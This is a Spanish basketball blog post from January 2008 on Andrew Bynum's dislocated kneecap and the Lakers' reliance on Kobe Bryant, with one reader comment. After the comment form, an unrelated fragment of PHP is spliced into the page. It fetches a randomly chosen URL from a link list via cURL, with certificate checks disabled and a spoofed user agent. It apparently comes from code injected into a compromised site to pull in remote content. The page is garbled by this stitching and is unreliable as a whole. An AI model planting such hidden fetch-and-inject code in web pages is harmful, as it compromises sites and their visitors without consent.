Esperanza dislocada

17 de January de 2008 por MagicJohnson32

bynumlesionado“Dislocación momentánea de la rótula izquierda”. Eso es, más o menos, lo que le sucedió a Andrew Bynum al caer sobre el pie de Lamar Odom durante el partido ante los Grizzlies del pasado domingo. Es, en consecuencia, lo que mantendrá al joven pívot 8 semanas sin jugar. Y es, al fin y al cabo, lo que ha roto las esperanzas de los Lakers. Más que romperlas, las ha dislocado, y ahora el deseo de la franquicia y sus aficionados es que, como sucedió con la rótula de Bynum, la dislocación sólo sea momentánea y las cosas vuelvan al lugar en el que estaban.

Hasta ahora los Lakers han sobrevivido al partido y medio disputado desde la lesión de Bynum. Aunque a duras penas: 37 puntos de Kobe y un tiro libre de Kwame Brown sirvieron para ganar a los Grizzlies, mientras que 48 puntos y una canasta ganadora de Bryant valieron para superar en la prórroga a los Sonics. En el partido de Seattle, el primero que los angelinos iniciaron sin Bynum tras su lesión, asistimos a un nuevo Bryant que en realidad es el viejo Bryant: Kobe asumió por completo la responsabilidad ofensiva de su equipo, lanzó 44 veces a canasta y anotó 21, entre ellas las tres últimas del partido, que permitieron a los Lakers remontar un 117-121 para convertirlo en el 123-121 final. Vimos, por tanto, al Bryant de hace un par de temporadas, el que batió récords anotadores con una media superior a los 35 puntos por encuentro.

El debate es inevitable: ¿qué necesitan ahora los Lakers de su jugador franquicia? ¿Qué actitud debe tomar Bryant? ¿Ha de seguir jugando como en estos primeros meses de temporada 07-08, lanzando menos, delegando más las responsabilidades en sus compañeros? ¿O ha de ejercer de líder absoluto, lanzar cuanto sea necesario y no esperar a que otros den un paso adelante que tal vez no llegue?kobegamewinnerseattle

No es tan sencillo. Echemos un vistazo a la aportación que vienen ofreciendo últimamente los jugadores que acompañan a Bryant en el quinteto titular de Los Angeles Lakers. En los tres últimos encuentros Lamar Odom suma un total de 24 puntos con 9 de 31 en tiros de campo; Derek Fisher ha anotado en ese mismo plazo 28 puntos con 11 de 32 en tiros; Luke Walton ha logrado 22 puntos con 9 de 20; y Kwame Brown, 13 puntos con 4 de 11. En total, 87 puntos con 33 de 94, apenas un 35% en tiros de campo. Para que resulte más ilustrativo todavía, Kobe ha realizado en estos tres encuentros exactamente la misma cifra de lanzamientos que sus cuatro compañeros juntos, pero con bastante más efectividad: 122 puntos con 43 de 94 en tiros, lo que supone un 45,7% de acierto.

La ausencia de Bynum resulta demoledora para el juego laker, pero también para la confianza del equipo. Kwame Brown y Ronny Turiaf quedan como únicos jugadores de pintura, ya que Chris Mihm se perderá como mínimo las dos próximas semanas por lesión. La franquicia ya se ha movilizado en busca de refuerzos y el primer nombre en aparecer fue el de Chris Webber. Al margen del morbo de ver en purple & gold a un icono de los mejores Kings de la historia, Webber puede aportar al triángulo poco más que su lectura de juego desde el poste medio-alto. Para jugadores dotados con el desplazamiento lateral de un autobús y la agilidad reducida a valores negativos, los Lakers ya tienen a Radmanovic. Suena también PJ Brown, otro semiretirado que añadiría solidez y experiencia, algo de lo que ahora mismo carecen los pívots de que dispone Phil Jackson.

En cualquier caso, con una previsión dramática de 27 partidos sin Andrew Bynum, 16 de los cuales serán lejos del Staples Center (en realidad, 15 más un partido contra Clippers como visitantes), no parece que a los Lakers les queden más caminos que asumir la realidad: el liderato de la ultracompetitiva Conferencia Oeste, que ahora mismo está en su posesión, durará poco. Posiblemente hasta el partido que esta misma madrugada les enfrentará a los Phoenix Suns.

Comenta

Un comentario a esta entrada

  1. txusma dice:
    #1

    Yo lo q veo claro es q Odom, en un acto d celos, ha lesionado deliberadamente a Bynum

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>